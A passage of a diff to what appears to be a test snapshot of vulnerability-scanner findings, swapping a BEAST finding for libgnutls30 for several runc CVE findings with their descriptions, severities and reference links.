"https://gitlab.com/gnutls/gnutls/-/commit/3db352734472d851318944db13be73da61300568", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/issues/1306", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/gnutls/-/merge_requests/1503", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-27561", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-27561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", + "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", + "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", + "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", + "https://github.com/opencontainers/runc/issues/3751", + "https://github.com/opencontainers/runc/pull/3785", + "https://github.com/opencontainers/runc/releases/tag/v1.1.5", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-27561", + ], + }, + "category": "Vulnerability", + "description": "runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "volume mount race condition (regression of CVE-2019-19921)", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4209", + "value": "https://avd.aquasec.com/nvd/cve-2023-27561", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220915-0005/", + "value": "https://access.redhat.com/security/cve/CVE-2023-27561", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5550-1", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5750-1", + "value": "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-4209", + "value": "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2011-3389", - "installedVersion": "3.6.7-4+deb10u5", - "packageName": "libgnutls30", - "references": [ - "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", - "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", - "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", - "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", - "http://curl.haxx.se/docs/adv_20120124B.html", - "http://downloads.asterisk.org/pub/security/AST-2016-001.html", - "http://ekoparty.org/2011/juliano-rizzo.php", - "http://eprint.iacr.org/2004/111", - "http://eprint.iacr.org/2006/136", - "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", - "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", - "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", - "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", - "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", - "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", - "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", - "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", - "http://marc.info/?l=bugtraq&m=132750579901589&w=2", - "http://marc.info/?l=bugtraq&m=132872385320240&w=2", - "http://marc.info/?l=bugtraq&m=133365109612558&w=2", - "http://marc.info/?l=bugtraq&m=133728004526190&w=2", - "http://marc.info/?l=bugtraq&m=134254866602253&w=2", - "http://marc.info/?l=bugtraq&m=134254957702612&w=2", - "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", - "http://osvdb.org/74829", - "http://rhn.redhat.com/errata/RHSA-2012-0508.html", - "http://rhn.redhat.com/errata/RHSA-2013-1455.html", - "http://secunia.com/advisories/45791", - "http://secunia.com/advisories/47998", - "http://secunia.com/advisories/48256", - "http://secunia.com/advisories/48692", - "http://secunia.com/advisories/48915", - "http://secunia.com/advisories/48948", - "http://secunia.com/advisories/49198", - "http://secunia.com/advisories/55322", - "http://secunia.com/advisories/55350", - "http://secunia.com/advisories/55351", - "http://security.gentoo.org/glsa/glsa-201203-02.xml", - "http://security.gentoo.org/glsa/glsa-201406-32.xml", - "http://support.apple.com/kb/HT4999", - "http://support.apple.com/kb/HT5001", - "http://support.apple.com/kb/HT5130", - "http://support.apple.com/kb/HT5281", - "http://support.apple.com/kb/HT5501", - "http://support.apple.com/kb/HT6150", - "http://technet.microsoft.com/security/advisory/2588513", - "http://vnhacker.blogspot.com/2011/09/beast.html", - "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", - "http://www.debian.org/security/2012/dsa-2398", - "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", - "http://www.ibm.com/developerworks/java/jdk/alerts/", - "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", - "http://www.insecure.cl/Beast-SSL.rar", - "http://www.kb.cert.org/vuls/id/864643", - "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", - "http://www.opera.com/docs/changelogs/mac/1151/", - "http://www.opera.com/docs/changelogs/mac/1160/", - "http://www.opera.com/docs/changelogs/unix/1151/", - "http://www.opera.com/docs/changelogs/unix/1160/", - "http://www.opera.com/docs/changelogs/windows/1151/", - "http://www.opera.com/docs/changelogs/windows/1160/", - "http://www.opera.com/support/kb/view/1004/", - "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", - "http://www.oracle.com/technetwork/topics/security/cpujul2015-2367936.html", - "http://www.oracle.com/technetwork/topics/security/javacpuoct2011-443431.html", - "http://www.redhat.com/support/errata/RHSA-2011-1384.html", - "http://www.redhat.com/support/errata/RHSA-2012-0006.html", - "http://www.securityfocus.com/bid/49388", - "http://www.securityfocus.com/bid/49778", - "http://www.securitytracker.com/id/1029190", - "http://www.securitytracker.com/id?1025997", - "http://www.securitytracker.com/id?1026103", - "http://www.securitytracker.com/id?1026704", - "http://www.ubuntu.com/usn/USN-1263-1", - "http://www.us-cert.gov/cas/techalerts/TA12-010A.html", - "https://access.redhat.com/security/cve/CVE-2011-3389", - "https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_fetchmail", - "https://bugzilla.novell.com/show_bug.cgi?id=719047", - "https://bugzilla.redhat.com/show_bug.cgi?id=737506", - "https://cert-portal.siemens.com/productcert/pdf/ssa-556833.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3389", - "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-006", - "https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_na-c03839862", - "https://hermes.opensuse.org/messages/13154861", - "https://hermes.opensuse.org/messages/13155432", - "https://ics-cert.us-cert.gov/advisories/ICSMA-18-058-02", - "https://linux.oracle.com/cve/CVE-2011-3389.html", - "https://linux.oracle.com/errata/ELSA-2011-1380.html", - "https://nvd.nist.gov/vuln/detail/CVE-2011-3389", - "https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14752", - "https://ubuntu.com/security/notices/USN-1263-1", - "https://www.cve.org/CVERecord?id=CVE-2011-3389", - ], - }, - "category": "Vulnerability", - "description": "The SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, (2) the Java URLConnection API, or (3) the Silverlight WebClient API, aka a "BEAST" attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "HTTPS: block-wise chosen-plaintext attack against SSL/TLS (BEAST)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2011-3389", + "value": "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", }, { "type": "URL", - "value": "http://arcticdog.wordpress.com/2012/08/29/beast-openssl-and-apache/", + "value": "https://github.com/opencontainers/runc/issues/3751", }, { "type": "URL", - "value": "http://blog.mozilla.com/security/2011/09/27/attack-against-tls-protected-communications/", + "value": "https://github.com/opencontainers/runc/pull/3785", }, { "type": "URL", - "value": "http://blogs.technet.com/b/msrc/archive/2011/09/26/microsoft-releases-security-advisory-2588513.aspx", + "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.5", }, { "type": "URL", - "value": "http://blogs.technet.com/b/srd/archive/2011/09/26/is-ssl-broken-more-about-security-advisory-2588513.aspx", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", }, { "type": "URL", - "value": "http://curl.haxx.se/docs/adv_20120124B.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", }, { "type": "URL", - "value": "http://downloads.asterisk.org/pub/security/AST-2016-001.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", }, { "type": "URL", - "value": "http://ekoparty.org/2011/juliano-rizzo.php", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", }, { "type": "URL", - "value": "http://eprint.iacr.org/2004/111", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", }, { "type": "URL", - "value": "http://eprint.iacr.org/2006/136", + "value": "https://ubuntu.com/security/notices/USN-6088-1", }, { "type": "URL", - "value": "http://googlechromereleases.blogspot.com/2011/10/chrome-stable-release.html", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "http://isc.sans.edu/diary/SSL+TLS+part+3+/11635", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-27561", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.0", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-43784", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-43784", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", + "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", + "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", + "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", + "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", + "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", + "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", + "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", + "https://pkg.go.dev/vuln/GO-2022-0274", + "https://www.cve.org/CVERecord?id=CVE-2021-43784", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc, netlink is used internally as a serialization system for specifying the relevant container configuration to the \`C\` portion of the code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration. This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces. The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure). runc version 1.0.3 contains a fix for this bug. As a workaround, one may try disallowing untrusted namespace paths from your container. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "runc: integer overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration", + "references": [ { "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00001.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-43784", }, { "type": "URL", - "value": "http://lists.apple.com/archives/Security-announce/2011//Oct/msg00002.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-43784", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Feb/msg00000.html", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Jul/msg00001.html", + "value": "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/May/msg00001.html", + "value": "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2012/Sep/msg00004.html", + "value": "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", }, { "type": "URL", - "value": "http://lists.apple.com/archives/security-announce/2013/Oct/msg00004.html", + "value": "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00049.html", + "value": "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-01/msg00051.html", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2012-05/msg00009.html", + "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00040.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132750579901589&w=2", + "value": "https://pkg.go.dev/vuln/GO-2022-0274", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=132872385320240&w=2", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43784", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.2", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29162", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8090", + "https://access.redhat.com/security/cve/CVE-2022-29162", + "https://bugzilla.redhat.com/2086398", + "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", + "https://errata.almalinux.org/9/ALSA-2022-8090.html", + "https://errata.rockylinux.org/RLSA-2022:8090", + "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", + "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", + "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", + "https://github.com/opencontainers/runc/releases/tag/v1.1.2", + "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", + "https://linux.oracle.com/cve/CVE-2022-29162.html", + "https://linux.oracle.com/errata/ELSA-2022-8090.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2022-29162", + "https://www.openwall.com/lists/oss-security/2022/05/12/1", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. A bug was found in runc prior to version 1.1.2 where \`runc exec --cap\` created processes with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during execve(2). This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in runc 1.1.2. This fix changes \`runc exec --cap\` behavior such that the additional capabilities granted to the process being executed (as specified via \`--cap\` arguments) do not include inheritable capabilities. In addition, \`runc spec\` is changed to not set any inheritable capabilities in the created example OCI spec (\`config.json\`) file.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "runc: incorrect handling of inheritable capabilities", + "references": [ { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133365109612558&w=2", + "value": "https://avd.aquasec.com/nvd/cve-2022-29162", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=133728004526190&w=2", + "value": "https://access.redhat.com/errata/RHSA-2022:8090", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254866602253&w=2", + "value": "https://access.redhat.com/security/cve/CVE-2022-29162", }, { "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=134254957702612&w=2", + "value": "https://bugzilla.redhat.com/2086398", }, { "type": "URL", - "value": "http://my.opera.com/securitygroup/blog/2011/09/28/the-beast-ssl-tls-issue", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", }, { "type": "URL", - "value": "http://osvdb.org/74829", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2012-0508.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-8090.html", }, { "type": "URL", - "value": "http://rhn.redhat.com/errata/RHSA-2013-1455.html", + "value": "https://errata.rockylinux.org/RLSA-2022:8090", }, { "type": "URL", - "value": "http://secunia.com/advisories/45791", + "value": "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", }, { "type": "URL", - "value": "http://secunia.com/advisories/47998", + "value": "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", }, { "type": "URL", - "value": "http://secunia.com/advisories/48256", + "value": "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", }, { "type": "URL", - "value": "http://secunia.com/advisories/48692", + "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.2", }, { "type": "URL", - "value": "http://secunia.com/advisories/48915", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", }, { "type": "URL", - "value": "http://secunia.com/advisories/48948", + "value": "https://linux.oracle.com/cve/CVE-2022-29162.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/49198", + "value": "https://linux.oracle.com/errata/ELSA-2022-8090.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/55322", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", }, { "type": "URL", - "value": "http://secunia.com/advisories/55350", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", }, { "type": "URL", - "value": "http://secunia.com/advisories/55351", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201203-02.xml", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", }, { "type": "URL", - "value": "http://security.gentoo.org/glsa/glsa-201406-32.xml", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT4999", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5001", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29162", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5130", + "value": "https://www.openwall.com/lists/oss-security/2022/05/12/1", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-28642", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-28642", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", + "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", + "https://github.com/opencontainers/runc/pull/3785", + "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", + "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-28642", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. It was found that AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration. This issue has been fixed in runc version 1.1.5, by prohibiting symlinked \`/proc\`. See PR #3785 for details. users are advised to upgrade. Users unable to upgrade should avoid using an untrusted container image.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "AppArmor can be bypassed when \`/proc\` inside the container is symlinked with a specific mount configuration", + "references": [ { "type": "URL", - "value": "http://support.apple.com/kb/HT5281", + "value": "https://avd.aquasec.com/nvd/cve-2023-28642", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT5501", + "value": "https://access.redhat.com/security/cve/CVE-2023-28642", }, { "type": "URL", - "value": "http://support.apple.com/kb/HT6150", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28642", }, { "type": "URL", - "value": "http://technet.microsoft.com/security/advisory/2588513", + "value": "https://github.com/advisories/GHSA-g2j6-57v7-gm8c", }, { "type": "URL", - "value": "http://vnhacker.blogspot.com/2011/09/beast.html", + "value": "https://github.com/opencontainers/runc/pull/3785", }, { "type": "URL", - "value": "http://www.apcmedia.com/salestools/SJHN-7RKGNM/SJHN-7RKGNM_R4_EN.pdf", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-g2j6-57v7-gm8c", }, { "type": "URL", - "value": "http://www.debian.org/security/2012/dsa-2398", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-28642", }, { "type": "URL", - "value": "http://www.educatedguesswork.org/2011/09/security_impact_of_the_rizzodu.html", + "value": "https://ubuntu.com/security/notices/USN-6088-1", }, { "type": "URL", - "value": "http://www.ibm.com/developerworks/java/jdk/alerts/", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "http://www.imperialviolet.org/2011/09/23/chromeandbeast.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-28642", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-25809", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-25809", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", + "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", + "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", + "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", + "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", + "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-25809", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers according to the OCI specification. In affected versions it was found that rootless runc makes \`/sys/fs/cgroup\` writable in following conditons: 1. when runc is executed inside the user namespace, and the \`config.json\` does not specify the cgroup namespace to be unshared (e.g.., \`(docker|podman|nerdctl) run --cgroupns=host\`, with Rootless Docker/Podman/nerdctl) or 2. when runc is executed outside the user namespace, and \`/sys\` is mounted with \`rbind, ro\` (e.g., \`runc spec --rootless\`; this condition is very rare). A container may gain the write access to user-owned cgroup hierarchy \`/sys/fs/cgroup/user.slice/...\` on the host . Other users's cgroup hierarchies are not affected. Users are advised to upgrade to version 1.1.5. Users unable to upgrade may unshare the cgroup namespace (\`(docker|podman|nerdctl) run --cgroupns=private)\`. This is the default behavior of Docker/Podman/nerdctl on cgroup v2 hosts. or add \`/sys/fs/cgroup\` to \`maskedPaths\`.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Rootless runc makes \`/sys/fs/cgroup\` writable", + "references": [ { "type": "URL", - "value": "http://www.insecure.cl/Beast-SSL.rar", + "value": "https://avd.aquasec.com/nvd/cve-2023-25809", }, { "type": "URL", - "value": "http://www.kb.cert.org/vuls/id/864643", + "value": "https://access.redhat.com/security/cve/CVE-2023-25809", }, { "type": "URL", - "value": "http://www.mandriva.com/security/advisories?name=MDVSA-2012:058", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25809", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1151/", + "value": "https://github.com/advisories/GHSA-m8cg-xc2p-r3fc", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/mac/1160/", + "value": "https://github.com/opencontainers/runc/commit/0d62b950e60f6980b54fe3bafd9a9c608dc1df17", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1151/", + "value": "https://github.com/opencontainers/runc/commit/0e6b818a2b0d24fdb6697614e5c5f115bbe8e3a5 (v1.1.5)", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/unix/1160/", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-m8cg-xc2p-r3fc", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1151/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-25809", }, { "type": "URL", - "value": "http://www.opera.com/docs/changelogs/windows/1160/", + "value": "https://ubuntu.com/security/notices/USN-6088-1", }, { "type": "URL", - "value": "http://www.opera.com/support/kb/view/1004/", + "value": "https://ubuntu.com/security/notices/USN-6088-2", }, { "type": "URL", - "value": "http://www.oracle.com/technetwork/topics/security/cpujan2015-1972971.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-25809", + }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210817142637-7d9622a276b7", + "packageName": "golang.org/x/sys", + "references": [ + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + 